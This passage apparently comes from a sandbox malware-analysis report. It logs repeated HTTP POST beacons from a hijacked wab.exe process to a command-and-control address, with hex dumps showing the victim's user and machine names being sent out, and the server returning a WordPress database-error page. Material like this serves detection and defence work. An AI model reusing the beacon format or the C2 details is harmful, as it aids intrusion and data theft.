                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:15:06.903403044 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:15:06.903412104 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              12192.168.2.54973024.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:15:07.211883068 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 153
                                                                              Connection: close
                                                                              Apr 18, 2024 21:15:07.374476910 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: (ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                              Apr 18, 2024 21:15:08.185544014 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:15:07 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:15:08.185565948 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:15:08.185578108 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              13192.168.2.54973124.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:15:08.492047071 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 153
                                                                              Connection: close
                                                                              Apr 18, 2024 21:15:08.654827118 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: (ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                              Apr 18, 2024 21:15:09.427582026 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:15:08 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:15:09.427644014 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:15:09.427736044 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              14192.168.2.54973224.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:15:09.740289927 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 153
                                                                              Connection: close
                                                                              Apr 18, 2024 21:15:09.902710915 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: (ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                              Apr 18, 2024 21:15:10.739690065 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:15:09 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
